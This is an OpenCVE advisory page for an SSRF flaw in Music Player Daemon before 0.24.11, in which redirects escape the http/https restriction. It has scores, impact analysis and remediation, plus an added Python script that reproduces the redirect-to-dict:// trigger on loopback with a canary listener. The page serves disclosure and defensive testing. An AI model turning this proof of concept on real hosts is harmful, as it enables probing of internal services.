Description
Music Player Daemon (MPD) before version 0.24.11 contains a server-side request forgery vulnerability in CurlInputPlugin where CURLOPT_FOLLOWLOCATION is set without CURLOPT_REDIR_PROTOCOLS_STR, allowing unauthenticated attackers to bypass the http/https scheme restriction by causing a malicious HTTP server to redirect to non-HTTP protocols such as gopher, ftp, sftp, ldap, dict, rtmp, or rtsp. Attackers can trigger this vulnerability via MPD commands that initiate URL fetches, including add, readcomments, albumart, readpicture, or load, to interact with internal or restricted network services on systems running libcurl versions prior to 7.85.0.
Published: 2026-05-28
Score: 6.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Music Player Daemon (MPD) contains a server-side request forgery flaw (CWE-918) in the CurlInputPlugin. The plugin enables CURLOPT_FOLLOWLOCATION, so libcurl follows HTTP redirects, but never sets CURLOPT_REDIR_PROTOCOLS_STR, so the redirect target is not held to the http/https restriction that applies to the URL a client supplies. An attacker who controls the HTTP server MPD is told to fetch from can therefore answer with a redirect to gopher, ftp, sftp, ldap, dict, rtmp or rtsp, and libcurl opens that connection from the MPD host. Because the connection originates on the server, an unauthenticated client can reach internal or otherwise restricted services visible only to that host. The severity is medium: the CVSS 4.0 vector (6.9) records no impact on MPD itself and a low confidentiality impact on the subsequent systems it is made to contact (SC:L), and the CVSS 3.1 vector (5.8) scores the same change of scope with low confidentiality impact.

Affected Systems

All MPD releases earlier than 0.24.11 are affected. The description scopes exploitability to MPD builds linked against libcurl older than 7.85.0, the libcurl release that introduced the CURLOPT_REDIR_PROTOCOLS_STR option. Exposure is governed by who can reach the MPD control interface (TCP port 6600 by default, or a Unix socket): the MPD protocol performs no authentication unless a password directive is configured, so any host that can open a connection to the listener can issue the triggering commands.

Risk and Exploitability

The flaw is triggered by any MPD command that makes the daemon open a URL through the curl input plugin: add, readcomments, albumart, readpicture or load. None of these requires administrative privileges; with MPD's default permissions and no password configured, every connected client may issue them. Beyond access to the control socket or TCP port, the attacker needs only an HTTP server under their control to serve the redirect. EPSS is below 1% and the CVE is not in CISA's KEV catalog, but the SSVC record lists a public proof of concept (Exploitation: poc) and rates the attack automatable. The impact is bounded by what the MPD host can reach: enumeration of internal hosts and ports, and requests to cleartext services such as dict, ldap or gopher listeners that rely on network position rather than authentication, which may return sensitive data.

Generated by OpenCVE AI on May 28, 2026 at 20:22 UTC.
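The check a practitioner would want before trusting a given MPD build is to stage the redirect described above entirely on loopback and watch whether MPD follows it. The Python script below is an added example written for this page, not code from the MPD project or from OpenCVE. It assumes MPD is reachable at 127.0.0.1:6600 (MPD's default port; edit MPD_HOST and MPD_PORT otherwise), uses readcomments as the trigger (add, albumart, readpicture and load are the other commands the description names), and points the redirect at a dict:// URL, one of the listed schemes, whose target is a local canary listener rather than any real service. Run it only against a test instance you own.

```python
"""Loopback check for the redirect-scheme issue described above (added example,
not MPD or OpenCVE code). Everything binds to 127.0.0.1 only: a canary TCP
listener that records inbound connections; an HTTP server whose only answer is
a 302 to a dict:// URL pointing at the canary; and an MPD protocol client that
asks MPD to open the HTTP URL with readcomments. A canary hit means MPD followed
the redirect to a non-HTTP scheme. The MPD address is an assumption (6600 is
MPD's default port)."""
import socket
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

MPD_HOST, MPD_PORT = "127.0.0.1", 6600  # assumed location of the MPD under test


class Canary:
    """Ephemeral loopback listener counting inbound connections."""

    def __init__(self):
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.hits = 0
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:  # listener closed
                return
            self.hits += 1
            conn.close()

    def wait_for_hit(self, timeout=1.0):
        """Poll up to timeout seconds; True once a connection has arrived."""
        deadline = time.monotonic() + timeout
        while not self.hits and time.monotonic() < deadline:
            time.sleep(0.02)
        return self.hits > 0


def make_redirector(location):
    """HTTP server on an ephemeral loopback port; every GET is answered with a
    302 carrying the given Location header (the malicious server's role)."""
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(302)
            self.send_header("Location", location)
            self.send_header("Content-Length", "0")
            self.end_headers()

        def log_message(self, *args):
            pass  # keep the check quiet

    srv = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def mpd_quote(arg):
    """MPD protocol argument quoting: double quotes, backslash-escaped \\ and \"."""
    return '"' + arg.replace("\\", "\\\\").replace('"', '\\"') + '"'


def mpd_command(host, port, command, timeout=15.0):
    """Send one command to MPD; return (response_lines, ok). ok is False on ACK."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        rf = s.makefile("rb")
        greeting = rf.readline().decode()
        if not greeting.startswith("OK MPD"):
            raise RuntimeError("not an MPD server: %r" % greeting)
        s.sendall((command + "\n").encode())
        lines = []
        while True:
            raw = rf.readline()
            if not raw:
                raise RuntimeError("connection closed before OK/ACK")
            line = raw.decode().rstrip("\n")
            if line == "OK":
                return lines, True
            lines.append(line)
            if line.startswith("ACK "):
                return lines, False


def check_mpd(host=MPD_HOST, port=MPD_PORT, scheme="dict"):
    """Returns (followed, mpd_response_lines); followed is True when the canary
    received a connection, i.e. MPD opened the non-HTTP redirect target."""
    canary = Canary()
    redirector = make_redirector(f"{scheme}://127.0.0.1:{canary.port}/d:test")
    url = f"http://127.0.0.1:{redirector.server_address[1]}/track.mp3"
    try:
        lines, _ = mpd_command(host, port, "readcomments " + mpd_quote(url))
        return canary.wait_for_hit(), lines
    finally:
        redirector.shutdown()
        redirector.server_close()
        canary.sock.close()


if __name__ == "__main__":
    try:
        followed, response = check_mpd()
    except OSError as e:
        print(f"could not talk to MPD at {MPD_HOST}:{MPD_PORT}: {e}")
    else:
        print("non-HTTP redirect FOLLOWED" if followed else "redirect not followed")
        print("\n".join(response))
```

A canary hit means MPD opened the dict:// target the redirect pointed at, which is exactly the behaviour the fix removes; a build that confines redirects to http/https should leave the canary untouched and normally returns an ACK for the failed fetch. The script only establishes whether the redirect is followed; it does not probe any internal service, and the redirector and canary are torn down before it returns.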

Remediation

No vendor advisory is recorded here; per the CVE description, MPD 0.24.11 is the first release without the flaw.

OpenCVE Recommended Actions

  • Upgrade MPD to 0.24.11 or later, the first release the description reports as fixed. For anyone auditing similar libcurl code, the hardening is to pair CURLOPT_FOLLOWLOCATION with CURLOPT_REDIR_PROTOCOLS_STR set to "http,https" (or, on libcurl older than 7.85.0, the bitmask option CURLOPT_REDIR_PROTOCOLS with CURLPROTO_HTTP | CURLPROTO_HTTPS), so redirects are bound by the same scheme restriction as the initial URL.
  • Update libcurl to 7.85.0 or newer. The description scopes the issue to older libcurl, so a current libcurl narrows exposure, but it does not replace the MPD upgrade: the missing option is in MPD's own code.
  • Limit who can reach the control interface (bind_to_address set to localhost or a Unix socket, firewall rules) and require a password so that unauthenticated network clients cannot issue add, load, readcomments, albumart or readpicture. Restrict the MPD host's egress so it cannot open connections to internal services on non-HTTP ports, and, if remote streams are not needed, disable the curl input plugin in mpd.conf (an input block naming plugin "curl" with enabled "no").

Generated by OpenCVE AI on May 28, 2026 at 20:22 UTC.


Advisories

No advisories yet.

History

Fri, 29 May 2026 16:00:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Musicplayerdaemon
                                       Musicplayerdaemon mpd
Vendors & Products                     Musicplayerdaemon
                                       Musicplayerdaemon mpd

Fri, 29 May 2026 14:30:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc
                           {'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 28 May 2026 21:30:00 +0000


Thu, 28 May 2026 19:45:00 +0000

Type          Values Removed   Values Added
Description                    Music Player Daemon (MPD) before version 0.24.11 contains a server-side request forgery vulnerability in CurlInputPlugin where CURLOPT_FOLLOWLOCATION is set without CURLOPT_REDIR_PROTOCOLS_STR, allowing unauthenticated attackers to bypass the http/https scheme restriction by causing a malicious HTTP server to redirect to non-HTTP protocols such as gopher, ftp, sftp, ldap, dict, rtmp, or rtsp. Attackers can trigger this vulnerability via MPD commands that initiate URL fetches, including add, readcomments, albumart, readpicture, or load, to interact with internal or restricted network services on systems running libcurl versions prior to 7.85.0.
Title                          Music Player Daemon < 0.24.11 SSRF via CurlInputPlugin
Weaknesses                     CWE-918
References
Metrics                        cvssV3_1 {'score': 5.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N'}
                               cvssV4_0 {'score': 6.9, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N'}


Subscriptions

Musicplayerdaemon Mpd
MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-29T13:57:37.912Z

Reserved: 2026-05-27T17:40:12.738Z

Link: CVE-2026-49129

Vulnrichment

Updated: 2026-05-29T13:57:34.097Z

NVD

Status : Deferred

Published: 2026-05-28T20:16:26.683

Modified: 2026-05-29T14:07:47.980

Link: CVE-2026-49129

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-29T15:47:54Z

Weaknesses